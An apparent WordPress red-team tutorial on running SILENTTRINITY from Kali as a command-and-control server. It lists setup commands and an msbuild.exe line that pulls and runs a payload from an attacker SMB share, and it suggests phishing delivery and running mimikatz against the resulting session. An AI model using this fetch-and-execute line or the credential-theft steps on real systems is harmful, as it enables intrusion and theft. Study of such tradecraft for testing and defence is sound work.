The Rise of C# and using Kali as a C2 Server with SILENTTRINITY

There’s been a disturbance in the red team field, have you felt it? It’s C#. More mature environments have finally caught on that Powershell can be used for malicious gains and pentesters could own your domain with a few Powershell commands, so admins have began to lock it down, EDRs have began to alert, and thus the saying goes, necessity is the mother of invention.

So why C#? Simply put, it has access to the .NET framework like Powershell does. The other big reason is that Microsoft has unsigned executables that will compile and execute C# code that is installed by default with Windows 10. Matt Graber found one of the executables and did an excellent write-up of it here. The TL;DR of it is that Microsoft.Workflow.Compiler.exe, which is installed as part of the .NET framework, will run C# code that is in a XOML file. There’s been a huge movement to use LOL (living off the land) tactics, meaning use what you have at your disposal instead of downloading things to victim machines, so this is huge. Of course, people immediately started to look at how to weaponize this as msbuild.exe was also another binary that would do compile and run C# code. byt3bl33d3r, who wrote crackmapexec, Empire, and Deathstar, developed a tool called SILENTTRINITY, which utilizes IronPython to create the C# code in python, then develop the XML file needed by msbuild (If using that payload option). This is how it works:

Using Kali, install Python3

apt-get install python3.7
apt-get install python3.7-dev

Then download SILENTTRINITY

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Then install the requirements.

cd SILENTTRINITY
python3.7 -m pip install -r requirements.txt

Then start SILENTTRINITY

cd Server
python3.7 st.py

Before starting SILENTTRINITY we’ll spin up a Samba server so that we don’t have to drop files to disk on the target and instead fetch the payload via SMB path. To do this, impacket has a set of tools in their github repository here, one of which is smbserver.py which will spin up a quick SMB server.

First download & install the impacket repository

git clone https://github.com/SecureAuthCorp/impacket.git 

cd impacket

pip install -r requirements.txt

python setup.py install

Then create a folder that will be shared

mkdir /root/SMB

Then run smbserver.py. Since it was ‘installed’ it can be ran anywhere via

smbserver.py SMB /root/SMB

1

Then start SILENTTRINITY

cd SILENTTRINITY/Server/
python3.7 st.py

You should then be seeing this

st

Next is to spin up an HTTP listener, as shown below.

run

Once that is spun up, next is to generate the actual stager, which is what will be executed. In this case, we’re using msbuild.

stager

The XML file is generated in the same directory as st.py, so copy that to the Samba share that was made which in this case is at /root/SMB.

cp msbuild.xml /root/SMB

msbuild

Finally, the trick now is to get the victim to execute the xml file via SMB path. Of course this is easy if you already have a shell on the machine, otherwise it’s possible to embed this link in a phishing email.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.43.248\SMB\msbuild.xml

runcmd

You’ll see a command prompt open up and if you look back at SILENTTRINITY, you’ll have a session.

session

And to list the sessions:

list

Now you can use modules against that session, like in Empire

modules

e.g. mimikatz

mimikatz

The purpose of this is to show that you never have to drop files to disk and can actually execute code remotely, in memory, by using SMB and binaries that exist on most current Windows deployments. The interesting thing is that this isn’t a bug with msbuild.exe or or workflow.complier.exe, those binaries are meant to do this, we’re just exploiting it for offensive purposes.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: